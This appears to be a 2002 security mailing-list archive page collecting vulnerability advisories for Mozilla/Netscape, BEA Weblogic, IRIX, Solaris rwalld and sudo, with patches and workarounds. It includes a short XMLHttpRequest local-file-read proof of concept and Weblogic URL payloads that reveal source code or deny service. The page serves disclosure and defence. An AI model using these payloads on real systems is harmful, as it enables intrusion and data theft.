eSecurityOnline Security Advisories notes
Hello, To help clear up any confusion about the Discovery Dates associated with the group of advisories that we are publishing today, I should explain the situation. We are publishing our advisories in groups after each group is approved internally. With the exception of the Microsoft issues, none of the vulnerabilities have been posted or discussed in public forums or lists. The discovery date that we list in the advisories refers to the date on which we discovered the advisory, rather than the date that we made the information public. Since none of these vulnerabilities (except for the Solaris CACHEFSD) have been actively exploited / seen in the wild, we have been patient in working with and waiting for vendors to complete vulnerability validation, and for patches to be developed and posted to vendor sites. We plan to publish more advisories in the near future, and hopefully in a much more timely fashion. Regards, Ken Williams eSecurityOnline Research and Development Team Ken Williams ; CISSP ; Technical Lead ; [EMAIL PROTECTED] eSecurityOnline - an eSecurity Venture of Ernst Young [EMAIL PROTECTED] ; www.esecurityonline.com ; 1-877-eSecurity
Reading local files in Netscape 6 and Mozilla (GM#001-NS)
GreyMagic Security Advisory GM#001-NS = By GreyMagic Software, Israel. 30 Apr 2002. Available in HTML format at http://security.greymagic.com/adv/gm001-ns/. Topic: Reading local files in Netscape 6 and Mozilla. Discovery date: 30 Mar 2002. Affected applications: == * All tested versions of Mozilla (0.9.7+) on Windows, other versions/platforms are believed to be vulnerable. * All tested versions of Netscape (6.1+) on Windows, other versions/platforms are believed to be vulnerable. Important notes: Netscape was contacted on 24 Apr 2002 through a form on their web site and through email to [EMAIL PROTECTED] and [EMAIL PROTECTED] They did not bother to respond AT ALL, and we think we know why. A while ago Netscape started a Bug Bounty program, which entitles researchers who find a bug that allows an attacker to run unsafe code or access files to a $1000 reward. By completely disregarding our post Netscape has earned themselves a $1000 and lost any credibility they might have had. The money is irrelevant, but using such a con to attract researchers into disclosing bugs to Netscape is extremely unprofessional. Netscape's faulty conducts made us rethink our disclosure guidelines and we came to the following decisions: * Release all future Netscape advisories without notifying Netscape at all. * Advise the security community to do the same. Netscape is deceiving researchers and should not be rewarded. * Advise customers to stop using Netscape Navigator through our security advisories and business contacts. [1] http://home.netscape.com/security/bugbounty.html Introduction: = XMLHTTP is a component that is primarily used for retrieving XML documents from a web server. On 15 Dec 2001 Jelmer published an advisory titled MSIE6 can read local files, which demonstrated how Microsoft's XMLHTTP component allows reading of local files by blindly following server-side redirections (patched by MS02-008). [1] http://www.xs4all.nl/~jkuperus/bug.htm [2] http://www.microsoft.com/technet/security/bulletin/MS02-008.asp Discussion: === Mozilla's version of XMLHTTP, the XMLHttpRequest object, is vulnerable to the exact same attack. By directing the open method to a web page that will redirect to a local/remote file it is possible to fool Mozilla into thinking it's still in the allowed zone, therefore allowing us to read it. It is then possible to inspect the content by using the responseText property. Exploit: This example attempts to read c:/test.txt, getFile.asp internally redirects to file://c:/test.txt: var oXML=new XMLHttpRequest(); oXML.open(GET,getFile.asp,false); oXML.send(null); alert(oXML.responseText); Solution: = Users of Netscape Navigator should move to a better performing, less buggy browser. Tested on: == Mozilla 0.9.7, NT4. Mozilla 0.9.9, NT4. Mozilla 0.9.9, Win2000. Netscape 6.1, NT4. Netscape 6.2.1, Win2000. Netscape 6.2.2, NT4. Netscape 6.2.2, Win2000. Demonstration: == A fully dynamic proof-of-concept demonstration of this issue is available at http://security.greymagic.com/adv/gm001-ns/. Feedback: = Please mail any questions or comments to [EMAIL PROTECTED] - Copyright © 2002 GreyMagic Software.
Re: QPopper 4.0.4 buffer overflow
Affected versions 4.0.3 and 4.0.4. default install. Servers, not processing user`s configuration file (~/.qpopper-options) are insensible to this bug. Our testing has shown that you must use the -u parameter to be susceptible to this vulnerability. If you don't use the -u parameter for qpopper this file is not accessed. You can use the -d parameter to view the debug output to verify this. Mike UNIX Systems Administrator at Wake Forest University. == J. Mike Rollins [EMAIL PROTECTED] Wake Forest University http://www.wfu.edu/~rollins Winston-Salem, NCwork: (336) 758-1938 ==
KPMG-2002016: Bea Weblogic incorrect URL parsing issues
Title: Bea Weblogic incorrect URL parsing issues BUG-ID: 2002016 Released: 30th Apr 2002 Problem: The Bea Weblogic server incorrectly parses certain types of URL requests. This can result in the physical path being revealed, a Denial of Service situation and revealing of .jsp sourcecode. Vulnerable: === - Bea Weblogic V6.1 Service Pack 2 on Windows 2000 Server - Other versions were not tested. Details: A problem with the URL parser in Bea Weblogic could allow a malicious user to reveal the physical path to the web root, cause a Denial of Service and reveal the sourcecode of .jsp files. Physical webroot) By appending %00.jsp to a normal .html request, a compiler error would in some cases be generated that would print out the path to the physical web root. A similar result can be achieved by prefixing with %5c (backslash): Denial of Service) This issue is very similar to the one reported in KPMG-2002003, in which we published that requesting a DOS device and appending .jsp to the request would exhaust the working threads and cause the web service to stop parsing HTTP and HTTPS requests. If a malicious user also added %00 in the request, it would still work. The server can handle about 10-11 working threads, so when this number of active threads has been reached, the server will no longer service any requests. Since both HTTP and HTTPS are handled by the same module, both are crippled if one is attacked. Sourcecode revealed) There are a number of ways to manipulate the URL in a way that will allow a malicious user to read the contents of a .jsp file. One way is to append %00x to the request, another could be to add +. to the request (exclamation marks excluded). Vendor URL: === You can visit the vendors webpage here: http://www.bea.com Vendor response: The vendor was contacted about the first issue on the 6th of November, 2001 and subsequently on the 12th of March, 2002 and finally on the 22nd of March, 2002 about the remainding issues. On the 25th of March, 2002 we received a private hotfix, which corrected the issues. On the 22nd of April, 2002 the vendor released a public bulletin. The vendors bulletin can be seen here: (note that the url has been wrapped for readability) http://dev2dev.bea.com/resourcelibrary/advisoriesdetail.jsp? highlight=advisoriesnotificationspath=components/dev2dev/ resourcelibrary/advisoriesnotifications/ securityadvisoriesbea020303.htm Be sure you read the vendor bulletin, as it suggests other security settings that might prevent future similar issues. Corrective action: == The following has been copied from the vendor bulletin: BEA WebLogic Server and Express version 6.1 standalone or as part of BEA WebLogic Enterprise 6.1 on all OS platforms Action: Apply Service Pack 2 and then apply this patch: ftp://ftpna.bea.com/pub/releases/security/CR069809_610sp2_v2.jar When Service Pack 3 becomes available, you can use that jar instead of Service Pack 2 and this patch. BEA WebLogic Server and Express version 6.0 standalone or as part of BEA WebLogic Enterprise 6.0 on all OS platforms Action: Apply Service Pack 2 with Rolling Patch 3 and then apply this patch: ftp://ftpna.bea.com/pub/releases/security/CR069809_60sp2rp3.jar BEA WebLogic Server and Express version 5.1 standalone or as part of BEA WebLogic Enterprise 5.1.x on all OS platforms Action: Apply Service Pack 11 and then apply this patch: ftp://ftpna.bea.com/pub/releases/security/CR069809_510sp11_v2.jar When Service Pack 12 becomes available, you can use that jar instead of Service Pack 11 and this patch. BEA WebLogic Server and Express 4.5.2 on all OS platforms Action: Apply Service Pack 2 and then apply this patch: ftp://ftpna.bea.com/pub/releases/security/CR045420_wls452sp2.zip BEA WebLogic Server and Express 4.5.1 on all OS platforms Action: Apply Service Pack 15. Author: Peter Gründl ([EMAIL PROTECTED]) KPMG is not responsible for the misuse of the information we provide through our security advisories. These advisories are a service to the professional security community. In no event shall KPMG be lia- ble for any consequences whatsoever arising out of or in connection with the use or spread of this information.
Re: Slrnpull Buffer Overflow (-d parameter)
Alex Hernandez ([EMAIL PROTECTED]) said: Linux RH.6.2 Sparc64 and below versions. On Red Hat Linux 6.2 for sparc: # ls -l /usr/bin/slrnpull -rwxr-s---1 news news48688 Feb 7 2000 /usr/bin/slrnpull # rpm -q slrn-pull slrn-pull-0.9.6.2-4 With all updates applied: # ls -l /usr/bin/slrnpull -rwxr-s---1 root news55456 Mar 1 2001 /usr/bin/slrnpull # rpm -q slrn-pull slrn-pull-0.9.6.4-0.6 Hence, while you may be able to get group news, the program is only runnable by group news. So, I don't think there are any security implications here. Bill
RE: Reading local files in Netscape 6 and Mozilla (GM#001-NS)
Disturbing. Netscape sure must be in financial problems since they are selling out on their users security for a lousy $1000. I know for one that I personally will release any future Netscape advisories with full public disclosure and without prior Netscape notification. As a matter of fact, why not start now ? The IRC:// protocol inhibited by Mozilla/NS6 seems to have a buffer overrun. A typical IRC URL could look like this: IRC://IRC.YOUR.TLD/#YOURCHANNEL The #YOURCHANNEL part is copied to a buffer that has a limit of 32K. If the input exceeds this limit, Mozilla 1.0 RC1 crashes with the following error: The exception unknown software exception (0xc0fd) occured in the application at location 0x60e42edf Mozilla 0.9.9 gives a similar exception: The exception unknown software exception (0xc0fd) occured in the application at location 0x60dd2c79. Other versions of Mozilla/NS6/Galeon likely share the same flaw. I haven't tested further on how practically exploitable this is. Short example online at http://jscript.dk/2002/4/moz1rc1tests/ircbufferoverrun.html Furthermore, Mozilla/Galeon/NS6 is prone to a local file detection vulnerability. When embedding a stylesheet with the LINK element, access to CSS files from other protocols is prohibited by the security manager. A simple HTTP redirect circumvents this security restriction and it becomes possible to use local or remote files of any type, with the side effect that you can detect if specific local files exist. http://jscript.dk/2002/4/NS6Tests/LinkLocalFileDetect.asp Regards Thor Larholm Jubii A/S - Internet Programmer -Original Message- From: GreyMagic Software [mailto:[EMAIL PROTECTED]] Sent: 30. april 2002 03:11 To: NTBugtraq; Bugtraq Subject: Reading local files in Netscape 6 and Mozilla (GM#001-NS) GreyMagic Security Advisory GM#001-NS = By GreyMagic Software, Israel. 30 Apr 2002. Available in HTML format at http://security.greymagic.com/adv/gm001-ns/. Topic: Reading local files in Netscape 6 and Mozilla. Discovery date: 30 Mar 2002. Affected applications: == * All tested versions of Mozilla (0.9.7+) on Windows, other versions/platforms are believed to be vulnerable. * All tested versions of Netscape (6.1+) on Windows, other versions/platforms are believed to be vulnerable. Important notes: Netscape was contacted on 24 Apr 2002 through a form on their web site and through email to [EMAIL PROTECTED] and [EMAIL PROTECTED] They did not bother to respond AT ALL, and we think we know why. A while ago Netscape started a Bug Bounty program, which entitles researchers who find a bug that allows an attacker to run unsafe code or access files to a $1000 reward. By completely disregarding our post Netscape has earned themselves a $1000 and lost any credibility they might have had. The money is irrelevant, but using such a con to attract researchers into disclosing bugs to Netscape is extremely unprofessional. Netscape's faulty conducts made us rethink our disclosure guidelines and we came to the following decisions: * Release all future Netscape advisories without notifying Netscape at all. * Advise the security community to do the same. Netscape is deceiving researchers and should not be rewarded. * Advise customers to stop using Netscape Navigator through our security advisories and business contacts. [1] http://home.netscape.com/security/bugbounty.html Introduction: = XMLHTTP is a component that is primarily used for retrieving XML documents from a web server. On 15 Dec 2001 Jelmer published an advisory titled MSIE6 can read local files, which demonstrated how Microsoft's XMLHTTP component allows reading of local files by blindly following server-side redirections (patched by MS02-008). [1] http://www.xs4all.nl/~jkuperus/bug.htm [2] http://www.microsoft.com/technet/security/bulletin/MS02-008.asp Discussion: === Mozilla's version of XMLHTTP, the XMLHttpRequest object, is vulnerable to the exact same attack. By directing the open method to a web page that will redirect to a local/remote file it is possible to fool Mozilla into thinking it's still in the allowed zone, therefore allowing us to read it. It is then possible to inspect the content by using the responseText property. Exploit: This example attempts to read c:/test.txt, getFile.asp internally redirects to file://c:/test.txt: var oXML=new XMLHttpRequest(); oXML.open(GET,getFile.asp,false); oXML.send(null); alert(oXML.responseText); Solution: = Users of Netscape Navigator should move to a better performing, less buggy browser. Tested on: == Mozilla 0.9.7, NT4. Mozilla 0.9.9, NT4. Mozilla 0.9.9, Win2000. Netscape 6.1, NT4. Netscape 6.2.1, Win2000. Netscape 6.2.2, NT4. Netscape 6.2.2, Win2000. Demonstration: == A fully dynamic proof-of-concept demonstration of this issue is available at
IRIX cpr vulnerability
-BEGIN PGP SIGNED MESSAGE- _ SGI Security Advisory Title: IRIX cpr vulnerability Number: 20020409-01-I Date: April 30, 2002 Reference: CAN-2002-0173 __ - --- - --- Issue Specifics --- - --- It's been reported that there is a potential buffer overflow vulnerability in the /usr/sbin/cpr program. If successfully exploited, this can lead to a root compromise. SGI has investigated the issue and recommends the following steps for neutralizing the exposure. It is HIGHLY RECOMMENDED that these measures be implemented on ALL vulnerable SGI systems. These issues have been corrected IRIX 6.5.11 and later versions. - -- - --- Impact --- - -- The cpr binary is installed by default on IRIX 6.5 systems as part of eoe.sw.cpr (the SGI Checkpoint-Restart Software). To see if cpr is installed, execute the following command: $ versions eoe.sw.cpr I = Installed, R = Removed Name DateDescription I eoe 09/19/2000 IRIX Execution Environment, 6.5.10f I eoe.sw 09/19/2000 IRIX Execution Environment Software I eoe.sw.cpr 09/19/2000 SGI Checkpoint-Restart Software If the command returns output similar to the above, then cpr is installed. This vulnerability may not be exploited by a remote user, a local account is required. This vulnerability has been fixed in IRIX 6.5.11. This vulnerability was assigned the following CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0173 - - --- Temporary Workaround --- - If you don't use the Checkpoint Restart software, it can be uninstalled using the command: # versions remove eoe.sw.cpr If you use the software, then SGI recommends upgrading to IRIX 6.5.11 or later. - - --- Solution --- - SGI has not provided patches for this vulnerability. Our recommendation is to upgrade to IRIX 6.5.11 or later. OS Version Vulnerable? Patch # Other Actions -- --- --- - IRIX 3.xunknown Note 1 IRIX 4.xunknown Note 1 IRIX 5.xunknown Note 1 IRIX 6.0.x unknown Note 1 IRIX 6.1unknown Note 1 IRIX 6.2unknown Note 1 IRIX 6.3unknown Note 1 IRIX 6.4unknown Note 1 IRIX 6.5 yes Notes 2 3 IRIX 6.5.1yes Notes 2 3 IRIX 6.5.2yes Notes 2 3 IRIX 6.5.3yes Notes 2 3 IRIX 6.5.4yes Notes 2 3 IRIX 6.5.5yes Notes 2 3 IRIX 6.5.6yes Notes 2 3 IRIX 6.5.7yes Notes 2 3 IRIX 6.5.8yes Notes 2 3 IRIX 6.5.9yes Notes 2 3 IRIX 6.5.10 yes Notes 2 3 IRIX 6.5.11 no IRIX 6.5.12 no IRIX 6.5.13 no IRIX 6.5.14 no IRIX 6.5.15 no IRIX 6.5.16 no NOTES 1) This version of the IRIX operating has been retired. Upgrade to an actively supported IRIX operating system. See http://support.sgi.com/irix/news/index.html#policy for more information. 2) If you have not received an IRIX 6.5.X CD for IRIX 6.5, contact your SGI Support Provider or URL: http://support.sgi.com/irix/swupdates/ 3) Upgrade to IRIX 6.5.11 or a later version of IRIX. - - --- Acknowledgments - SGI wishes to thank TESO Security, FIRST and the users of the Internet Community at large for their assistance in this matter. - - - --- Links --- - - SGI Security Advisories can be found at: http://www.sgi.com/support/security/ and ftp://patches.sgi.com/support/free/security/advisories/ SGI Security Patches can be found at: http://www.sgi.com/support/security/ and ftp://patches.sgi.com/support/free/security/patches/ SGI patches for IRIX can be found at the following patch servers: http://support.sgi.com/irix/ and ftp://patches.sgi.com/ SGI freeware updates for IRIX can be found at: http://freeware.sgi.com/ SGI fixes for SGI open sourced code can be found on: http://oss.sgi.com/projects/ SGI patches and RPMs for Linux can be found at: http://support.sgi.com/linux/ or
IRIX /dev/ipfilter Denial of Service vulnerability
-BEGIN PGP SIGNED MESSAGE- _ SGI Security Advisory Title: /dev/ipfilter Denial of Service vulnerability Number: 20020408-01-I Date: April 30, 2002 Reference: CAN-2002-0172 __ - --- - --- Issue Specifics --- - --- SGI has determined that the default permissions on /dev/ipfilter as created by /dev/MAKEDEV could lead to a Denial of Service attack. The default permissions were 644, and while the permissions are set to that value it is possible for a non-root user to disrupt network traffic. SGI has investigated the issue and recommends the following steps for neutralizing the exposure. It is HIGHLY RECOMMENDED that these measures be implemented on ALL vulnerable SGI systems. - -- - --- Impact --- - -- The /dev/ipfilter device is created by default on IRIX 6.5 systems during installation. The ipfilterd software that is intended to use this device is not installed by default, it is part of the eoe.sw.ipgate package. To determine if you are vulnerable, execute the following command: $ ls -l /dev/ipfilter crw-r--r--1 root sys59, 0 Apr 12 08:33 /dev/ipfilter If your /dev/ipfilter shows the permissions and ownership of 644 as in the example above, then you are vulnerable. These vulnerabilities may not be exploited by a remote user, a local account is required. This issue has been corrected in IRIX 6.5.11 and later versions. This vulnerability was assigned the following CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0172 - - --- Temporary Workaround --- - You can fix the permissions of /dev/ipfilter with the following command: # chmod 600 /dev/ipfilter After running that command, it should look like this: # ls -l /dev/ipfilter crw---1 root sys59, 0 Apr 12 08:33 /dev/ipfilter However, SGI recommends upgrading to IRIX 6.5.11 or later because if the /dev/MAKEDEV script is run it will reset the permissions to 644. The /dev/MAKEDEV script has been changed in IRIX 6.5.11 to create the device with 600 permissions. - - --- Solution --- - SGI has not provided patches for this vulnerability. Our recommendation is to upgrade to IRIX 6.5.11 or later. OS Version Vulnerable? Patch # Other Actions -- --- --- - IRIX 3.xunknown Note 1 IRIX 4.xunknown Note 1 IRIX 5.xunknown Note 1 IRIX 6.0.x unknown Note 1 IRIX 6.1unknown Note 1 IRIX 6.2unknown Note 1 IRIX 6.3unknown Note 1 IRIX 6.4unknown Note 1 IRIX 6.5 yes Notes 2 3 IRIX 6.5.1yes Notes 2 3 IRIX 6.5.2yes Notes 2 3 IRIX 6.5.3yes Notes 2 3 IRIX 6.5.4yes Notes 2 3 IRIX 6.5.5yes Notes 2 3 IRIX 6.5.6yes Notes 2 3 IRIX 6.5.7yes Notes 2 3 IRIX 6.5.8yes Notes 2 3 IRIX 6.5.9yes Notes 2 3 IRIX 6.5.10 yes Notes 2 3 IRIX 6.5.11 no IRIX 6.5.12 no IRIX 6.5.13 no IRIX 6.5.14 no IRIX 6.5.15 no IRIX 6.5.16 no NOTES 1) This version of the IRIX operating has been retired. Upgrade to an actively supported IRIX operating system. See http://support.sgi.com/irix/news/index.html#policy for more information. 2) If you have not received an IRIX 6.5.X CD for IRIX 6.5, contact your SGI Support Provider or URL: http://support.sgi.com/irix/swupdates/ 3) Upgrade to IRIX 6.5.11 or later. - - - --- Links --- - - SGI Security Advisories can be found at: http://www.sgi.com/support/security/ and ftp://patches.sgi.com/support/free/security/advisories/ SGI Security Patches can be found at: http://www.sgi.com/support/security/ and ftp://patches.sgi.com/support/free/security/patches/ SGI patches for IRIX can be found at the following patch servers: http://support.sgi.com/irix/ and ftp://patches.sgi.com/ SGI freeware updates for IRIX can be found at: http://freeware.sgi.com/ SGI fixes for SGI open sourced code can be found on: http://oss.sgi.com/projects/ SGI patches and RPMs for Linux can be found at: http://support.sgi.com/linux/ or
IRIX pmcd Denial of Service vulnerability
-BEGIN PGP SIGNED MESSAGE- _ SGI Security Advisory Title: pmcd Denial of Service vulnerability Number: 20020407-01-I Date: April 30, 2002 Reference: CAN-2000-1193 __ - --- - --- Issue Specifics --- - --- It's been reported that it is possible to feed certain parameters to the /usr/etc/pmcd daemon that will make it grow in size to the point where a Denial of Service attack can be created. SGI has investigated the issue and recommends the following steps for neutralizing the exposure. It is HIGHLY RECOMMENDED that these measures be implemented on ALL vulnerable SGI systems. These issues have been corrected in IRIX 6.5.11 and later versions. - -- - --- Impact --- - -- The pmcd daemon is part of SGI's Performance Co-Pilot suite of performance monitoring tools. This is an optional product and is not installed by default, but is supplied with the base OS. To see if pmcd is installed, execute the following command: % versions pcp_eoe I = Installed, R = Removed Name DateDescription I pcp_eoe 01/22/2002 Performance Co-Pilot Execution Only Environment, 6.5.15f I pcp_eoe.man 01/22/2002 PCP EOE Documentation, 6.5.15f I pcp_eoe.man.relnotes 01/22/2002 PCP EOE Release Notes, 6.5.15f I pcp_eoe.sw 01/22/2002 PCP EOE Software, 6.5.15f I pcp_eoe.sw.eoe 01/22/2002 PCP EOE, 6.5.15f If the output looks similar to the above, then Performance Co-Pilot is installed, and you are vulnerable if the version shown is earlier than 6.5.11. This vulnerability may be exploited by a remote user, no local account is required. This vulnerability has been fixed in IRIX 6.5.11 and later versions. This vulnerability was assigned the following CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-1193 http://www.iss.net/security_center/static/4284.php - - --- Temporary Workaround --- - If you don't use the Performance Co-Pilot software, it can be uninstalled using the command: # versions remove pcp_eoe If you use the software, then SGI recommends upgrading to IRIX 6.5.11 or a later version. - - --- Solution --- - SGI has not provided patches for this vulnerability. Our recommendation is to upgrade to IRIX 6.5.11 or a later version. OS Version Vulnerable? Patch # Other Actions -- --- --- - IRIX 3.xunknown Note 1 IRIX 4.xunknown Note 1 IRIX 5.xunknown Note 1 IRIX 6.0.x unknown Note 1 IRIX 6.1unknown Note 1 IRIX 6.2unknown Note 1 IRIX 6.3unknown Note 1 IRIX 6.4unknown Note 1 IRIX 6.5 yes Notes 2 3 IRIX 6.5.1yes Notes 2 3 IRIX 6.5.2yes Notes 2 3 IRIX 6.5.3yes Notes 2 3 IRIX 6.5.4yes Notes 2 3 IRIX 6.5.5yes Notes 2 3 IRIX 6.5.6yes Notes 2 3 IRIX 6.5.7yes Notes 2 3 IRIX 6.5.8yes Notes 2 3 IRIX 6.5.9yes Notes 2 3 IRIX 6.5.10 yes Notes 2 3 IRIX 6.5.11 no IRIX 6.5.12 no IRIX 6.5.13 no IRIX 6.5.14 no IRIX 6.5.15 no IRIX 6.5.16 no NOTES 1) This version of the IRIX operating has been retired. Upgrade to an actively supported IRIX operating system. See http://support.sgi.com/irix/news/index.html#policy for more information. 2) If you have not received an IRIX 6.5.X CD for IRIX 6.5, contact your SGI Support Provider or URL: http://support.sgi.com/irix/swupdates/ 3) Upgrade to IRIX 6.5.11 or a later version of IRIX. - - --- Acknowledgments - SGI wishes to thank Marcelo Magnasco, ISS, FIRST and the users of the Internet Community at large for their assistance in this matter. - - - --- Links --- - - SGI Security Advisories can be found at: http://www.sgi.com/support/security/ and ftp://patches.sgi.com/support/free/security/advisories/ SGI Security Patches can be found at: http://www.sgi.com/support/security/ and
Adivosry + Exploit for Remote Root Hole in Default Installation of Popular Commercial Operating System
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 GOBBLES SECURITY ADVISORY #32 ALERT! REMOTE ROOT HOLE IN DEFAULT INSTALL OF POPULAR OPERATING SYSTEM! ALERT! Forward: @route so was fydor trying to make his code unreadable when he write nmap? @route or was that just the fallout of poor planning? @route this is awful @route if ( !victim || !sport || !dport || sd 0) { @route fprintf(stderr, send_udp_raw: One or more of your parameters suck!\n); @route free(packet); @route return -1; @route } @route This is the program that is used everywhere and written up in countless books? @route it's pretty much obscene that this program doesnt use libnet Systems Affected: Sun Solaris 6, Sun Solaris 7, Sun Solaris 8 (sparc and x86 versions) Threat Level: Super duper high. Vendor Notification Status: Initial advisory sent to Sun Microsystems on Friday, April 5th. After long series of email exchange, Sun.com engineers finally begin working on developing patch for bug. Days later, CERT contact GOBBLES about bug. Dialouge happen then too with CERT. Both Sun Microsystems and CERT have promised to make sure that GOBBLES name is in both official advisories released. Hey, we do this for fame and attention, now that we are no longer weaned we must do something! Some time, full disclosure is real pain in ass. Everyone want more and more time to get things fixed before advisory is released. Time to grace lists with more GOBBLES Advisory. Exploit: A proof-of-concept exploit for this vulnerability has been attached to the bottom of this email. GOBBLES wrote it in way to keep unskilled from using it, like security assesment team from Vigilante who not able to tell if vulnerability is real or not in opensourced product after reading advisory. At the same time, skilled penetrators should not have any trouble using the code provided to exploit systems in the wild. Don't send GOBBLES email asking for other versions of exploit. Some things better left private and given to close friends for their own motivations. If you can't figure out how to work with this exploit and get remote root from what is provided in the advisory, really there is no reason for you to be using an exploit. A Few Words: There are some thing that GOBBLES have to say, some thing very heartfelt that he need to communicate to the world, some thing that best said in song, please take time to read lyric and understand what GOBBLES trying to say. . . the sun has blessed the rays are gone and all the kids have left their tears and gone home, sweet 17, sour 29 and i can't explain myself what i'd hoped to find you were all so kind when i was near, and if you're still feeling down then maybe you need me around to love and hold you don't say i hadn't told you so maybe you need me around, i had no luck i had no shame i had no cause just seventeen days of rain and you in my eyes, just one more song to slay this earth and i can't explain myself just what it's worth what was all i had but not all i'd need and i can't escape the fact that i still bleed, and if you're still feeling down and if this seems way too loud then maybe you need me around, i had no voice i had no drive i had no choice i've done my time had myself had my band i had my love had no hand in watching it all fall apart and if you're still feeling down then maybe you need me around to lift and scold you to send you crashing all right now maybe you need me around. - -Blissed and Gone, the Smashing Pumpkins Description of Problem (Part One): One of the default RPC services in Sun Solaris versions 6-8 is has an insecure syslog() statement, which allow remote attacker to execute custom code as root. Hehe, GOBBLES bet you getting pissed because in all this length of advisory, still no mention of what is vulnerable, hehehe, ;. Keep control of temper, and keep reading, because you about to find out, hehehe GOBBLES is silly today. Remotely Exploitable: Yes. Locally Exploitable: Yes. Privilage Attained After Exploitation: Root. Exploit Included: As GOBBLES did mention previously, yes. It get you root. Girls will be impressed with mailing list reading skills and source code leeching technique utilized to gain remote root to Solaris machines. Included exploit for Sparc. Name of Vulnerable Service: $ grep rwall /etc/inetd.conf # The rwall server allows others to post messages to users on this machine. walld/1 tli rpc/datagram_v wait root /usr/lib/netsvc/rwall/rpc.rwalld rpc.rwalld It rwalld that vulnerable. It run as root. Attacker get root from exploiting it. Description of Problem (Part Two): Inside rwall_subr.c we see: /* * Make sure the wall programs exists, is executeable, and runs */ if (rval == -1 || (wall.st_mode S_IXUSR) == 0 || (fp = popen(WALL_PROG, w)) == NULL) { syslog(LOG_NOTICE, rwall message received but could not
SuSE Security Announcement: sudo (SuSE-SA:2002:014)
-BEGIN PGP SIGNED MESSAGE- __ SuSE Security Announcement Package:sudo Announcement-ID:SuSE-SA:2002:014 Date: Tue Apr 30 16:00:00 MEST 2002 Affected products: 6.4, 7.0, 7.1, 7.2, 7.3, 8.0, SuSE Firewall Adminhost VPN, SuSE Linux Admin-CD for Firewall, SuSE Linux Enterprise Server, SuSE Linux Connectivity Server Vulnerability Type: local privilege escalation Severity (1-10):6 SuSE default package: yes Other affected systems: All systems with sudo installed. Content of this advisory: 1) security vulnerability resolved: Heap overflow in sudo. problem description, discussion, solution and upgrade information 2) pending vulnerabilities, solutions, workarounds 3) standard appendix (further information) __ 1) problem description, brief discussion, solution, upgrade information The sudo program allows local users to execute certain configured commands with root priviledges. Sudo contains a heap overflow in its prompt assembling function. The input used to create the password prompt is user controlled and not properly length-checked before copied to certain heap locations. This allows local attackers to overflow the heap of sudo, thus executing arbitrary commands as root. We would like to thank GlobalInterSec for finding and researching this vulnerability. As a temporary workaround you may remove the setuid bit from sudo by issuing the following command as root: chmod -s /usr/bin/sudo. Please download the update package for your distribution and verify its integrity by the methods listed in section 3) of this announcement. Then, install the package using the command rpm -Fhv file.rpm to apply the update. Our maintenance customers are being notified individually. The packages are being offered to install from the maintenance web. i386 Intel Platform: SuSE-8.0 ftp://ftp.suse.com/pub/suse/i386/update/8.0/ap1/sudo-1.6.5p2-79.i386.rpm b54f68ff4b32f9d920f2f1ff887d1ddc source rpm: ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/sudo-1.6.5p2-79.src.rpm fd1ccf6fe52c6b999c5ed24a2f3a4e65 SuSE-7.3 ftp://ftp.suse.com/pub/suse/i386/update/7.3/ap1/sudo-1.6.3p7-83.i386.rpm 80edbf5caf02c519cf2c01d6ba76d22f source rpm: ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/sudo-1.6.3p7-83.src.rpm 77962932840740ce5e3dfe57a887592d SuSE-7.2 ftp://ftp.suse.com/pub/suse/i386/update/7.2/ap1/sudo-1.6.3p6-92.i386.rpm 669aa8db134e39f462cb9f2648f6735f source rpm: ftp://ftp.suse.com/pub/suse/i386/update/7.2/zq1/sudo-1.6.3p6-92.src.rpm 249b1ef0135dcfede3648982900e277c SuSE-7.1 ftp://ftp.suse.com/pub/suse/i386/update/7.1/ap1/sudo-1.6.3p6-91.i386.rpm 6b3b84f0a4c687e91da179937b87048a source rpm: ftp://ftp.suse.com/pub/suse/i386/update/7.1/zq1/sudo-1.6.3p6-91.src.rpm bf59a6b200a0fb130f3528ce23698be0 SuSE-7.0 ftp://ftp.suse.com/pub/suse/i386/update/7.0/ap1/sudo-1.6.3p6-90.i386.rpm 5b67ef9fed383242111953d942c62174 source rpm: ftp://ftp.suse.com/pub/suse/i386/update/7.0/zq1/sudo-1.6.3p6-90.src.rpm c35f6390b360500b7b649e4590a748cc SuSE-6.4 ftp://ftp.suse.com/pub/suse/i386/update/6.4/ap1/sudo-1.5.9p1-87.i386.rpm 82d98116eccc73c7a0ce03a51e9b5378 source rpm: ftp://ftp.suse.com/pub/suse/i386/update/6.4/zq1/sudo-1.5.9p1-87.src.rpm e75e2608036a963a7339fe4632a2550b Sparc Platform: SuSE-7.3 ftp://ftp.suse.com/pub/suse/sparc/update/7.3/ap1/sudo-1.6.3p7-33.sparc.rpm bd492b6d601ceb30486e3e970a2211a3 source rpm: ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/sudo-1.6.3p7-33.src.rpm d2435d180cdd76647e1f1416e93c2420 SuSE-7.1 ftp://ftp.suse.com/pub/suse/sparc/update/7.1/ap1/sudo-1.6.3p6-37.sparc.rpm bbad36265f93fac25d59f8c26b1ccd52 source rpm: ftp://ftp.suse.com/pub/suse/sparc/update/7.1/zq1/sudo-1.6.3p6-37.src.rpm a328d2eb0fdc816341a68febfeb5a33a SuSE-7.0 ftp://ftp.suse.com/pub/suse/sparc/update/7.0/ap1/sudo-1.6.3p6-36.sparc.rpm 48e7b360b45bae0b3e9e90b3bf945f75 source rpm: ftp://ftp.suse.com/pub/suse/sparc/update/7.0/zq1/sudo-1.6.3p6-36.src.rpm bd8f11a8916340e0d243ae1cc647df26 AXP Alpha Platform: SuSE-7.1 ftp://ftp.suse.com/pub/suse/axp/update/7.1/ap1/sudo-1.6.3p6-40.alpha.rpm 4505dd58fe309ef0a4515db6a6980ec4 source rpm: ftp://ftp.suse.com/pub/suse/axp/update/7.1/zq1/sudo-1.6.3p6-40.src.rpm 85dfbe40da4d93d54d3c16f6489a7f32
ISS Advisory: Remote Denial of Service Vulnerability in RealSecure Network Sensor
